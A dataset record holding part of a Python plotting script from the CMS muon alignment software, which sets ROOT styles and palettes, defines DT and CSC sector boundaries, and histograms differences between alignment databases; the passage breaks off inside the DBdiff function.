hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
794af37ff41a93fd2e440895579a235dc7cb31d7
| 163,404
|
py
|
Python
|
Alignment/MuonAlignmentAlgorithms/scripts/plotscripts.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
Alignment/MuonAlignmentAlgorithms/scripts/plotscripts.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
Alignment/MuonAlignmentAlgorithms/scripts/plotscripts.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
import ROOT, array, os, re, random
from math import *
import time
import pickle
# python 2.6 has json modue; <2.6 could use simplejson
try:
import json
except ImportError:
import simplejson as json
# sign conventions and some dimensions
from signConventions import *
# common muon types structures
from mutypes import *
# NOTE(review): presumably flipped to True once compiled C++ helpers are
# loaded elsewhere in this file -- confirm against the full module.
CPP_LOADED = False
# containers for test results for map plots, filled by the map-plot routines
MAP_RESULTS_SAWTOOTH = {}
MAP_RESULTS_FITSIN = {}
MAP_RESULTS_BINS = {}
# general container for all test results
TEST_RESULTS = {}
#############################################################
# Convenience functions
def wheelm2only(dt, wheel, station, sector):
    """Chamber selection predicate: DT chambers in wheel -2 only."""
    return dt == "DT" and wheel == -2

def wheelm1only(dt, wheel, station, sector):
    """Chamber selection predicate: DT chambers in wheel -1 only."""
    return dt == "DT" and wheel == -1

def wheel0only(dt, wheel, station, sector):
    """Chamber selection predicate: DT chambers in wheel 0 only."""
    return dt == "DT" and wheel == 0

def wheelp1only(dt, wheel, station, sector):
    """Chamber selection predicate: DT chambers in wheel +1 only."""
    return dt == "DT" and wheel == 1

def wheelp2only(dt, wheel, station, sector):
    """Chamber selection predicate: DT chambers in wheel +2 only."""
    return dt == "DT" and wheel == 2
def wheelLetter(wheel):
    """Map a DT wheel number (-2..+2) to its letter code ("A".."E").

    Raises Exception for any other wheel number.
    """
    letter_by_wheel = {-2: "A", -1: "B", 0: "C", 1: "D", 2: "E"}
    if wheel not in letter_by_wheel:
        raise Exception
    return letter_by_wheel[wheel]
def wheelNumber(wheell):
    """Map a DT wheel letter code ("A".."E") back to its wheel number (-2..+2).

    Raises Exception for any other letter.
    """
    wheel_by_letter = {"A": -2, "B": -1, "C": 0, "D": 1, "E": 2}
    if wheell not in wheel_by_letter:
        raise Exception
    return wheel_by_letter[wheell]
def mean(xlist):
    """Arithmetic mean of an iterable of numbers (consumed once).

    Raises ZeroDivisionError on an empty input, as before.
    """
    total = 0.
    count = 0
    for value in xlist:
        total += value
        count += 1
    return total/count
def rms(xlist):
    """Root-mean-square of an iterable of numbers (consumed once).

    Raises ZeroDivisionError on an empty input, as before.
    """
    sum_of_squares = 0.
    count = 0
    for value in xlist:
        sum_of_squares += value**2
        count += 1
    return sqrt(sum_of_squares/count)
def stdev(xlist):
    """Population standard deviation of an iterable of numbers.

    Uses the single-pass E[x^2] - E[x]^2 form so the input may be any
    iterable (consumed once).  The variance is clamped at zero before the
    square root: floating-point cancellation can make s2/n - (s/n)**2 come
    out as a tiny negative number for near-constant data, which previously
    made sqrt() raise ValueError.

    Raises ZeroDivisionError on an empty input, as before.
    """
    s, s2, n = 0., 0., 0.
    for x in xlist:
        s += x
        s2 += x**2
        n += 1.
    variance = s2/n - (s/n)**2
    # guard against small negative variance from rounding error
    return sqrt(max(variance, 0.))
def wmean(xlist):
    """Inverse-variance weighted mean of (value, error) pairs.

    Pairs with a non-positive error are ignored.  Returns a tuple
    (weighted mean, propagated error).  Raises ZeroDivisionError when no
    pair has a positive error, as before.
    """
    weighted_sum = 0.
    total_weight = 0.
    for value, error in xlist:
        if error > 0.:
            weight = 1./error**2
            weighted_sum += value*weight
            total_weight += weight
    return weighted_sum/total_weight, sqrt(1./total_weight)
#############################################################
# Global handle to the TDR plotting style; populated by setTDRStyle()
# below and consulted throughout this module.
tdrStyle = None
def setTDRStyle():
    """Create and install the CMS P-TDR ROOT plotting style.

    Builds a TStyle named "tdrStyle", stores it in the module-level
    `tdrStyle` global, and makes it the current ROOT style via cd().
    Called once at import time (below).
    """
    global tdrStyle
    tdrStyle = ROOT.TStyle("tdrStyle","Style for P-TDR")
    # For the canvas:
    tdrStyle.SetCanvasBorderMode(0)
    tdrStyle.SetCanvasColor(ROOT.kWhite)
    tdrStyle.SetCanvasDefH(600) #Height of canvas
    tdrStyle.SetCanvasDefW(600) #Width of canvas
    tdrStyle.SetCanvasDefX(0)   #Position on screen
    tdrStyle.SetCanvasDefY(0)
    # For the Pad:
    tdrStyle.SetPadBorderMode(0)
    # tdrStyle.SetPadBorderSize(Width_t size = 1)
    tdrStyle.SetPadColor(ROOT.kWhite)
    tdrStyle.SetPadGridX(False)
    tdrStyle.SetPadGridY(False)
    tdrStyle.SetGridColor(0)
    tdrStyle.SetGridStyle(3)
    tdrStyle.SetGridWidth(1)
    # For the frame:
    tdrStyle.SetFrameBorderMode(0)
    tdrStyle.SetFrameBorderSize(1)
    tdrStyle.SetFrameFillColor(0)
    tdrStyle.SetFrameFillStyle(0)
    tdrStyle.SetFrameLineColor(1)
    tdrStyle.SetFrameLineStyle(1)
    tdrStyle.SetFrameLineWidth(1)
    # For the histo:
    # tdrStyle.SetHistFillColor(1)
    # tdrStyle.SetHistFillStyle(0)
    tdrStyle.SetHistLineColor(1)
    tdrStyle.SetHistLineStyle(0)
    tdrStyle.SetHistLineWidth(1)
    # tdrStyle.SetLegoInnerR(Float_t rad = 0.5)
    # tdrStyle.SetNumberContours(Int_t number = 20)
    tdrStyle.SetEndErrorSize(2)
    # tdrStyle.SetErrorMarker(20)
    tdrStyle.SetErrorX(0.)
    tdrStyle.SetMarkerStyle(20)
    #For the fit/function:
    tdrStyle.SetOptFit(1)
    tdrStyle.SetFitFormat("5.4g")
    tdrStyle.SetFuncColor(2)
    tdrStyle.SetFuncStyle(1)
    tdrStyle.SetFuncWidth(1)
    #For the date:
    tdrStyle.SetOptDate(0)
    # tdrStyle.SetDateX(Float_t x = 0.01)
    # tdrStyle.SetDateY(Float_t y = 0.01)
    # For the statistics box:
    tdrStyle.SetOptFile(0)
    tdrStyle.SetOptStat(0) # To display the mean and RMS: SetOptStat("mr")
    tdrStyle.SetStatColor(ROOT.kWhite)
    tdrStyle.SetStatFont(42)
    tdrStyle.SetStatFontSize(0.025)
    tdrStyle.SetStatTextColor(1)
    tdrStyle.SetStatFormat("6.4g")
    tdrStyle.SetStatBorderSize(1)
    tdrStyle.SetStatH(0.1)
    tdrStyle.SetStatW(0.15)
    # tdrStyle.SetStatStyle(Style_t style = 1001)
    # tdrStyle.SetStatX(Float_t x = 0)
    # tdrStyle.SetStatY(Float_t y = 0)
    # Margins:
    tdrStyle.SetPadTopMargin(0.05)
    tdrStyle.SetPadBottomMargin(0.13)
    tdrStyle.SetPadLeftMargin(0.13)
    tdrStyle.SetPadRightMargin(0.05)
    # For the Global title:
    tdrStyle.SetOptTitle(0)
    tdrStyle.SetTitleFont(42)
    tdrStyle.SetTitleColor(1)
    tdrStyle.SetTitleTextColor(1)
    tdrStyle.SetTitleFillColor(10)
    tdrStyle.SetTitleFontSize(0.05)
    # tdrStyle.SetTitleH(0) # Set the height of the title box
    # tdrStyle.SetTitleW(0) # Set the width of the title box
    # tdrStyle.SetTitleX(0) # Set the position of the title box
    # tdrStyle.SetTitleY(0.985) # Set the position of the title box
    # tdrStyle.SetTitleStyle(Style_t style = 1001)
    # tdrStyle.SetTitleBorderSize(2)
    # For the axis titles:
    tdrStyle.SetTitleColor(1, "XYZ")
    tdrStyle.SetTitleFont(42, "XYZ")
    tdrStyle.SetTitleSize(0.06, "XYZ")
    # tdrStyle.SetTitleXSize(Float_t size = 0.02) # Another way to set the size?
    # tdrStyle.SetTitleYSize(Float_t size = 0.02)
    tdrStyle.SetTitleXOffset(0.9)
    tdrStyle.SetTitleYOffset(1.05)
    # tdrStyle.SetTitleOffset(1.1, "Y") # Another way to set the Offset
    # For the axis labels:
    tdrStyle.SetLabelColor(1, "XYZ")
    tdrStyle.SetLabelFont(42, "XYZ")
    tdrStyle.SetLabelOffset(0.007, "XYZ")
    tdrStyle.SetLabelSize(0.05, "XYZ")
    # For the axis:
    tdrStyle.SetAxisColor(1, "XYZ")
    tdrStyle.SetStripDecimals(True)
    tdrStyle.SetTickLength(0.03, "XYZ")
    tdrStyle.SetNdivisions(510, "XYZ")
    tdrStyle.SetPadTickX(1)  # To get tick marks on the opposite side of the frame
    tdrStyle.SetPadTickY(1)
    # Change for log plots:
    tdrStyle.SetOptLogx(0)
    tdrStyle.SetOptLogy(0)
    tdrStyle.SetOptLogz(0)
    # Postscript options:
    tdrStyle.SetPaperSize(20.,20.)
    # tdrStyle.SetLineScalePS(Float_t scale = 3)
    # tdrStyle.SetLineStyleString(Int_t i, const char* text)
    # tdrStyle.SetHeaderPS(const char* header)
    # tdrStyle.SetTitlePS(const char* pstitle)
    # tdrStyle.SetBarOffset(Float_t baroff = 0.5)
    # tdrStyle.SetBarWidth(Float_t barwidth = 0.5)
    # tdrStyle.SetPaintTextFormat(const char* format = "g")
    # tdrStyle.SetPalette(Int_t ncolors = 0, Int_t* colors = 0)
    # tdrStyle.SetTimeOffset(Double_t toffset)
    # tdrStyle.SetHistMinimumZero(True)
    tdrStyle.cd()
# install the style as a side effect of importing this module
setTDRStyle()
def set_palette(name=None, ncontours=999):
    """Install a ROOT gradient color palette chosen by name.

    stops, red, green and blue are parallel lists of equal length giving
    the RGB components at each gradient stop.  Recognized names:
    "halfgray", "gray", "blues", "reds", "antigray", "fire", "antifire";
    any other value (including the default None) selects the rainbow-like
    default palette.  `ncontours` sets the number of color gradations.
    """
    gray_levels = [1.00, 0.84, 0.61, 0.34, 0.00]
    five_stops = [0.00, 0.34, 0.61, 0.84, 1.00]
    four_stops = [0.00, 0.20, 0.80, 1.00]
    if name == "halfgray":
        stops = five_stops
        half_levels = [1. - (1. - level)/2. for level in gray_levels]
        red = half_levels[:]
        green = half_levels[:]
        blue = half_levels[:]
    elif name == "gray":
        stops = five_stops
        red = gray_levels[:]
        green = gray_levels[:]
        blue = gray_levels[:]
    elif name == "blues":
        stops = five_stops
        red = gray_levels[:]
        green = gray_levels[:]
        blue = [1.00]*5
    elif name == "reds":
        stops = five_stops
        red = [1.00]*5
        green = gray_levels[:]
        blue = gray_levels[:]
    elif name == "antigray":
        stops = five_stops
        inverted = gray_levels[::-1]
        red = inverted[:]
        green = inverted[:]
        blue = inverted[:]
    elif name == "fire":
        stops = four_stops
        red = [1.00, 1.00, 1.00, 0.50]
        green = [1.00, 1.00, 0.00, 0.00]
        blue = [0.20, 0.00, 0.00, 0.00]
    elif name == "antifire":
        stops = four_stops
        red = [0.50, 1.00, 1.00, 1.00]
        green = [0.00, 0.00, 1.00, 1.00]
        blue = [0.00, 0.00, 0.00, 0.20]
    else:
        # default palette, looks cool
        stops = five_stops
        red = [0.00, 0.00, 0.87, 1.00, 0.51]
        green = [0.00, 0.81, 1.00, 0.20, 0.00]
        blue = [0.51, 1.00, 0.12, 0.00, 0.00]
    stop_arr = array.array('d', stops)
    red_arr = array.array('d', red)
    green_arr = array.array('d', green)
    blue_arr = array.array('d', blue)
    ROOT.TColor.CreateGradientColorTable(len(stop_arr), stop_arr, red_arr, green_arr, blue_arr, ncontours)
    ROOT.gStyle.SetNumberContours(ncontours)
# install the default palette at import time
set_palette()
######################################################################################################
## sector phi edges in:  me11 me12 me13 me14 me21 me22 me31 me32 me41 me42 mb1 mb2 mb3 mb4
## index:                  0    1    2    3    4    5    6    7    8    9   10  11  12  13
#phiedgesCSC36 = [pi/180.*(-175. + 10.*i) for i in range(36)]
#phiedgesCSC18 = [pi/180.*(-175. + 20.*i) for i in range(18)]
# regular CSC chamber boundaries in radians: 36-fold (10 degree) and
# 18-fold (20 degree) rings, starting at -5 degrees
phiedgesCSC36 = [pi/180.*(-5. + 10.*i) for i in range(36)]
phiedgesCSC18 = [pi/180.*(-5. + 20.*i) for i in range(18)]
# one edge list per station, indexed by stationIndex(); the last four
# entries (DT MB1-MB4) are explicit sector boundaries rather than a
# regular grid -- NOTE(review): these lists are shared (aliased) between
# stations and are read elsewhere in this module, so they must not be
# mutated in place
phiedges = [
    phiedgesCSC36,
    phiedgesCSC36,
    phiedgesCSC36,
    phiedgesCSC36,
    phiedgesCSC18,
    phiedgesCSC36,
    phiedgesCSC18,
    phiedgesCSC36,
    phiedgesCSC18,
    phiedgesCSC36,
    [0.35228048120123945, 0.87587781482541827, 1.3994776462193192, 1.923076807996136, 2.4466741416203148, 2.970273973014216,
     -2.7893121723885534, -2.2657148387643748, -1.7421150073704739, -1.2185158455936571, -0.69491851196947851, -0.17131868057557731],
    [0.22000706229660855, 0.74360690430428489, 1.267204926935573, 1.7908033890915052, 2.3144032310991816, 2.8380012537304697,
     -2.9215855912931841, -2.3979857492855081, -1.8743877266542202, -1.3507892644982882, -0.82718942249061178, -0.30359139985932365],
    [0.29751957124275596, 0.82111826253905784, 1.3447162969496083, 1.8683158980376524, 2.3919145893339548, 2.915512623744505,
     -2.844073082347037, -2.3204743910507353, -1.7968763566401849, -1.2732767555521407, -0.74967806425583894, -0.22608002984528835],
    [3.0136655290752188, -2.7530905195097337, -2.2922883025568734, -1.9222915077192773, -1.5707963267948966, -1.2193011458705159,
     -0.84930435103291968, -0.38850213408005951, 0.127927124514574, 0.65152597487624719, 1.1322596819239259, 1.5707963267948966,
     2.0093329716658674, 2.4900666787135459]]
def phiedges2c():
    """Export the per-station phi edges as a C array in phiedges_export.h.

    Each station's edge list is sorted and padded with 999 sentinels to a
    fixed width of 37 before being written as one row of
    `double phiedges[14][37]`.

    Fix: the original sorted and padded the *shared* inner lists of the
    module-level `phiedges` structure in place (`ed.sort()` /
    `ed.extend(...)` on the originals), permanently corrupting the edge
    data for every later caller (philines, SawTeethFunction, ...).  Each
    list is now copied before being modified.  The py2-only `print>>ff`
    was also replaced by an equivalent write().
    """
    rows = []
    for edges in phiedges:
        ed = sorted(edges)                    # sorted copy -- leave the original intact
        ed.extend([999] * (37 - len(ed)))     # pad to fixed row width 37
        rows.append('{' + ', '.join(map(str, ed)) + '}')
    res = ', '.join(rows)
    ff = open("phiedges_export.h", mode="w")
    ff.write('double phiedges[14][37] = {' + res + '};\n')
    ff.close()
class SawTeethFunction:
    """Piecewise-linear ("sawtooth") function of phi, usable as a ROOT TF1 body.

    Each phi sector of the station named `name` gets its own independent
    offset and slope, so fits using this function need 2*n parameters
    (n = number of sector edges).
    """
    def __init__(self, name):
        # name is used only to select the edge set via stationIndex()
        self.name = name
        # private copy of this station's sector edges, plus a sorted copy
        self.edges = (phiedges[stationIndex(name)])[:]
        self.ed = sorted(self.edges)
        # add some padding to the end
        self.ed.append(pi+1.)
        self.n = len(self.edges)
    def __call__(self, xx, par):
        """TF1 call interface: xx[0] is phi; par holds (offset, slope) per sector."""
        # wrap x in the most negative phi sector into positive phi
        x = xx[0]
        if x < self.ed[0]: x += 2*pi
        # locate sector: first i with ed[i] < x <= ed[i+1]
        for i in range(0,self.n):
            if x <= self.ed[i]: continue
            if x > self.ed[i+1]: continue
            return par[i*2] + par[i*2+1]*(x - self.ed[i])
        # outside every sector (should not normally happen)
        return 0
    def pp(self):
        """Debug printout of the edge configuration."""
        print self.name, self.n
        print self.edges
        print self.ed
def stationIndex(name):
    """Return the phiedges index (0-13) for a station identified by `name`.

    `name` may be a chamber id string containing "MB" or "ME" (decoded via
    idToPostalAddress), or an alignment object name containing a lowercase
    tag such as "mem11"/"mep11" (CSC) or "st1".."st4" (DT).  Returns None
    when no station can be identified.
    """
    if "MB" in name or "ME" in name:
        # assume the name is an id string
        pa = idToPostalAddress(name)
        if pa is None:
            return None
        if pa[0] == "CSC":
            # (station, ring) -> index 0-9
            csc_index = {(1, 1): 0, (1, 2): 1, (1, 3): 2, (1, 4): 3,
                         (2, 1): 4, (2, 2): 5, (3, 1): 6, (3, 2): 7,
                         (4, 1): 8, (4, 2): 9}
            return csc_index.get((pa[2], pa[3]))
        if pa[0] == "DT":
            # DT stations 1-4 occupy indices 10-13
            if 1 <= pa[2] <= 4:
                return 9 + pa[2]
        return None
    # lowercase alignment-object names: substring tags checked in order
    tag_table = (
        (("mem11", "mep11"), 0), (("mem12", "mep12"), 1), (("mem13", "mep13"), 2),
        (("mem14", "mep14"), 3), (("mem21", "mep21"), 4), (("mem22", "mep22"), 5),
        (("mem31", "mep31"), 6), (("mem32", "mep32"), 7), (("mem41", "mep41"), 8),
        (("mem42", "mep42"), 9),
        (("st1",), 10), (("st2",), 11), (("st3",), 12), (("st4",), 13),
    )
    for tags, index in tag_table:
        if any(tag in name for tag in tags):
            return index
def philines(name, window, abscissa):
    """Draw dashed vertical lines at the sector/chamber phi boundaries.

    name     -- station name or chamber id; selects the edge set through
                stationIndex() and decides between DT ("st...") and CSC
                labeling styles
    window   -- half-height of the plot: lines span [-window, +window]
    abscissa -- optional (lo, hi) x-range; edges outside it are skipped

    Draws into the current pad; drawn objects are kept alive via the
    module-level philine_tlines / philine_labels lists.
    """
    global philine_tlines, philine_labels
    philine_tlines = []
    edges = phiedges[stationIndex(name)]
    #print name, len(edges)
    for phi in edges:
        if abscissa is None or abscissa[0] < phi < abscissa[1]:
            philine_tlines.append(ROOT.TLine(phi, -window, phi, window))
            philine_tlines[-1].SetLineStyle(2)
            philine_tlines[-1].Draw()
    if "st" in name:  # DT sector labels
        philine_labels = []
        edges = edges[:]
        edges.sort()
        if "st4" in name:
            # station 4 has 14 sectors (13 and 14 interleaved)
            labels = [" 7", " 8", " 9", "14", "10", "11", "12", " 1", " 2", " 3", "13", " 4", " 5", " 6"]
        else:
            labels = [" 8", " 9", "10", "11", "12", " 1", " 2", " 3", " 4", " 5", " 6"]
            edges = edges[1:]
        for phi, label in zip(edges, labels):
            littlebit = 0.
            # nudge a few labels to avoid overlaps
            if label in (" 7", " 9", "14", "10", "11"): littlebit = 0.05
            philine_labels.append(ROOT.TText(phi-0.35+littlebit, -0.9*window, label))
            philine_labels[-1].Draw()
        philine_labels.append(ROOT.TText(-2.9, -0.75*window, "Sector:"))
        philine_labels[-1].Draw()
    if "CSC" in name:  # CSC chamber labels
        philine_labels = []
        edges = edges[:]
        edges.sort()
        labels = [" 1", " 2", " 3", " 4", " 5", " 6", " 7", " 8", " 9", "10", "11", "12", "13", "14", "15", "16", "17", "18",
                  "19", "20", "21", "22", "23", "24", "25", "26", "27", "28", "29", "30", "31", "32", "33", "34", "35", "36"]
        #else:
        #    labels = [" 8", " 9", "10", "11", "12", " 1", " 2", " 3", " 4", " 5", " 6"]
        #    edges = edges[1:]
        for phi, label in zip(edges, labels):
            littlebit = 0.
            #if label in (" 7", " 9", "14", "10", "11"): littlebit = 0.05
            philine_labels.append(ROOT.TText(phi+littlebit, -0.9*window, label))
            philine_labels[-1].SetTextFont(42)
            philine_labels[-1].SetTextSize(0.028)
            philine_labels[-1].Draw()
        philine_labels.append(ROOT.TText(0, -0.78*window, "Chamber:"))
        philine_labels[-1].SetTextSize(0.035)
        philine_labels[-1].Draw()
def zlines(window, abscissa):
    """Draw dashed vertical lines at the DT wheel boundaries in z and
    label the wheel numbers along the bottom of the current pad.

    window   -- half-height of the plot: lines span [-window, +window]
    abscissa -- optional (lo, hi) x-range; boundaries outside it are skipped
    """
    global zline_tlines
    zline_tlines = []
    for z in (-401.625, -133.875, 133.875, 401.625):
        if abscissa is None or abscissa[0] < z < abscissa[1]:
            boundary = ROOT.TLine(z, -window, z, window)
            boundary.SetLineStyle(2)
            boundary.Draw()
            zline_tlines.append(boundary)
    # NOTE(review): unlike philines, these labels live in a local list and
    # could be garbage-collected after return -- confirm they persist.
    zline_labels = []
    for x, text in ((-550, "-2"), (-300, "-1"), (-10, "0"), (250, "+1"), (500, "+2")):
        zline_labels.append(ROOT.TText(x, -0.9*window, text))
    for label in zline_labels:
        label.Draw()
    caption = ROOT.TText(-600, -0.75*window, "Wheel:")
    zline_labels.append(caption)
    caption.Draw()
def rlines(disk, window, abscissa):
    """Draw dashed vertical lines at the CSC ring boundaries in r.

    disk     -- 1 for the three-ring station 1 layout, anything else for
                the single boundary of stations 2-4
    window   -- half-height of the plot: lines span [-window, +window]
    abscissa -- optional (lo, hi) x-range; boundaries outside it are skipped
    """
    global rline_tlines
    rline_tlines = []
    boundaries = [150., 270., 480.] if disk == 1 else [350.]
    for r in boundaries:
        if abscissa is None or abscissa[0] < r < abscissa[1]:
            boundary = ROOT.TLine(r, -window, r, window)
            boundary.SetLineStyle(2)
            boundary.Draw()
            rline_tlines.append(boundary)
######################################################################################################
def getReportByPostalAddress(postal_address, report):
    """Return the first entry of `report` whose postal_address matches,
    or None when no entry matches."""
    matches = (entry for entry in report if entry.postal_address == postal_address)
    return next(matches, None)
######################################################################################################
def DBMC(database, reports, window=10., windows=None, selection=None, phi=False,
         color=ROOT.kBlue-8, style=1, bins=50, normalized=False, getvalues=False,
         name="", canvas=None, reportdiff=False, inlog=True):
    """Compare an alignment database against MC truth.

    Thin wrapper around DBdiff with the second database and report set
    left as None (i.e. compared against zeros).
    """
    return DBdiff(database, None, reports, None,
                  window=window, windows=windows, selection=selection, phi=phi,
                  color=color, style=style, bins=bins, normalized=normalized,
                  getvalues=getvalues, name=name, canvas=canvas,
                  reportdiff=reportdiff, inlog=inlog)
def DBdiff(database1, database2, reports1, reports2,
           window=10., windows=None, selection=None, phi=False, color=ROOT.kBlue-8,
           style=1, bins=50, normalized=False, getvalues=False, name="tmp", canvas=None, reportdiff=False, inlog=False ):
    """Histogram per-chamber differences between two alignment databases.

    For every chamber whose report(s) have status "PASS", fills six global
    histograms (hx, hy, hz, hphix, hphiy, hphiz) with the database1 -
    database2 differences of the six alignment parameters, then draws them
    on `canvas` (or the global c1).

    database1/database2 -- alignment geometries with .dt/.csc dicts keyed
        by postal-address tail; database2 None means compare against zeros
    reports1/reports2   -- fit-report lists; reports2 None means MC truth
    window/windows      -- histogram half-range (scalar, or one per coord)
    selection           -- optional predicate over postal-address fields
    phi                 -- treat x as r*phi and label/scale in mrad
    normalized          -- fill pulls (delta/sigma) and overlay Gaussians
    getvalues           -- optional dict of lists collecting (value, error)
    reportdiff          -- subtract the report's delta from the DB delta
    inlog               -- use log y-scale on populated pads

    Returns the six histograms, plus the six Gaussian TF1s when normalized.
    """
    tdrStyle.SetOptStat("emrou")
    tdrStyle.SetStatW(0.40)
    # one half-window per coordinate; a scalar `window` is replicated
    wnd = [window]*6
    if windows is not None:
        i=0
        for w in windows:
            wnd[i] = windows[i]
            i+=1
    global hx, hy, hz, hphix, hphiy, hphiz
    if phi:
        hx = ROOT.TH1F("%s_phi" % name, "", bins, -wnd[0], wnd[0])
    else:
        hx = ROOT.TH1F("%s_x" % name, "", bins, -wnd[0], wnd[0])
    hy = ROOT.TH1F("%s_y" % name, "", bins, -wnd[1], wnd[1])
    hz = ROOT.TH1F("%s_z" % name, "", bins, -wnd[2], wnd[2])
    hphix = ROOT.TH1F("%s_phix" % name, "", bins, -wnd[3], wnd[3])
    hphiy = ROOT.TH1F("%s_phiy" % name, "", bins, -wnd[4], wnd[4])
    hphiz = ROOT.TH1F("%s_phiz" % name, "", bins, -wnd[5], wnd[5])
    for r1 in reports1:
        # apply the selection only when its arity matches this address
        if selection is None or (selection.__code__.co_argcount == len(r1.postal_address) and selection(*r1.postal_address)):
            if reports2 is None:
                # no second report set: build an all-zero stand-in report
                r2 = Report(r1.chamberId, r1.postal_address, r1.name)
                r2.add_parameters(ValErr(0., 0., 0.), ValErr(0., 0., 0.), ValErr(0., 0., 0.),
                                  ValErr(0., 0., 0.), ValErr(0., 0., 0.), ValErr(0., 0., 0.), 0., 0., 0., 0.)
            else:
                r2 = getReportByPostalAddress(r1.postal_address, reports2)
                if r2 is None: continue
            found = False
            if r1.postal_address[0] == "DT":
                if r1.postal_address[1:] in database1.dt:
                    found = True
                    db1 = database1.dt[r1.postal_address[1:]]
                    if database2 is None:
                        # compare against a zeroed-out alignable
                        db2 = DTAlignable()
                        db2.x = db2.y = db2.z = db2.phix = db2.phiy = db2.phiz = 0.
                        db2.xx = db2.xy = db2.xz = db2.yx = db2.yy = db2.yz = db2.zx = db2.zy = db2.zz = 0.
                    else:
                        db2 = database2.dt[r1.postal_address[1:]]
            else:
                # skip ME1/a
                if r1.postal_address[2]==1 and r1.postal_address[3]==4: continue
                if r1.postal_address[1:] in database1.csc:
                    found = True
                    db1 = database1.csc[r1.postal_address[1:]]
                    if database2 is None:
                        # compare against a zeroed-out alignable
                        db2 = CSCAlignable()
                        db2.x = db2.y = db2.z = db2.phix = db2.phiy = db2.phiz = 0.
                        db2.xx = db2.xy = db2.xz = db2.yx = db2.yy = db2.yz = db2.zx = db2.zy = db2.zz = 0.
                    else:
                        db2 = database2.csc[r1.postal_address[1:]]
            if found and r1.status == "PASS" and r2.status == "PASS":
                # x (or r*phi): filled only when both fit errors exist and are non-zero
                if r1.deltax is not None and r2.deltax is not None and r1.deltax.error is not None and \
                   r2.deltax.error is not None and (r1.deltax.error**2 + r2.deltax.error**2) > 0.:
                    delta = db1.x - db2.x
                    if reportdiff: delta -= r1.deltax.value
                    if normalized:
                        fill = delta/sqrt(r1.deltax.error**2 + r2.deltax.error**2) * signConventions[r1.postal_address][0]
                    else:
                        if phi:
                            # r*phi displacement in mrad (divide by chamber radius)
                            fill = delta/signConventions[r1.postal_address][3] * 1000. * signConventions[r1.postal_address][0]
                        else:
                            # cm -> mm
                            fill = delta * 10. * signConventions[r1.postal_address][0]
                    hx.Fill(fill)
                    if getvalues not in (False, None):
                        getvalues["x"].append((fill, 10. * sqrt(r1.deltax.error**2 + r2.deltax.error**2)))
                # y
                if r1.deltay is not None and r2.deltay is not None and r1.deltay.error is not None and \
                   r2.deltay.error is not None and (r1.deltay.error**2 + r2.deltay.error**2) > 0.:
                    delta = db1.y - db2.y
                    if reportdiff: delta -= r1.deltay.value
                    if normalized:
                        fill = delta/sqrt(r1.deltay.error**2 + r2.deltay.error**2) * signConventions[r1.postal_address][1]
                    else:
                        fill = delta * 10. * signConventions[r1.postal_address][1]
                    hy.Fill(fill)
                    if getvalues not in (False, None):
                        getvalues["y"].append((fill, 10. * sqrt(r1.deltay.error**2 + r2.deltay.error**2)))
                # z
                if r1.deltaz is not None and r2.deltaz is not None and r1.deltaz.error is not None and \
                   r2.deltaz.error is not None and (r1.deltaz.error**2 + r2.deltaz.error**2) > 0.:
                    delta = db1.z - db2.z
                    if reportdiff: delta -= r1.deltaz.value
                    if normalized:
                        fill = delta/sqrt(r1.deltaz.error**2 + r2.deltaz.error**2) * signConventions[r1.postal_address][2]
                    else:
                        fill = delta * 10. * signConventions[r1.postal_address][2]
                    hz.Fill(fill)
                    if getvalues not in (False, None):
                        getvalues["z"].append((fill, 10. * sqrt(r1.deltaz.error**2 + r2.deltaz.error**2)))
                # phix
                if r1.deltaphix is not None and r2.deltaphix is not None and r1.deltaphix.error is not None and \
                   r2.deltaphix.error is not None and (r1.deltaphix.error**2 + r2.deltaphix.error**2) > 0.:
                    delta = db1.phix - db2.phix
                    if reportdiff: delta -= r1.deltaphix.value
                    if normalized:
                        fill = delta/sqrt(r1.deltaphix.error**2 + r2.deltaphix.error**2)
                    else:
                        fill = delta * 1000.
                    hphix.Fill(fill)
                    if getvalues not in (False, None):
                        getvalues["phix"].append((fill, 10. * sqrt(r1.deltaphix.error**2 + r2.deltaphix.error**2)))
                # phiy
                if r1.deltaphiy is not None and r2.deltaphiy is not None and r1.deltaphiy.error is not None and \
                   r2.deltaphiy.error is not None and (r1.deltaphiy.error**2 + r2.deltaphiy.error**2) > 0.:
                    delta = db1.phiy - db2.phiy
                    if reportdiff:
                        delta -= r1.deltaphiy.value
                        # debug printout for residuals beyond 0.02 mrad
                        if abs(delta)>0.02/1000: print r1.postal_address, 1000*delta, "=", 1000*db1.phiy - 1000*db2.phiy, "-", 1000*r1.deltaphiy.value, "... ",1000*db1.phiy , 1000*db2.phiy
                    if normalized:
                        fill = delta/sqrt(r1.deltaphiy.error**2 + r2.deltaphiy.error**2)
                    else:
                        fill = delta * 1000.
                    hphiy.Fill(fill)
                    if getvalues not in (False, None):
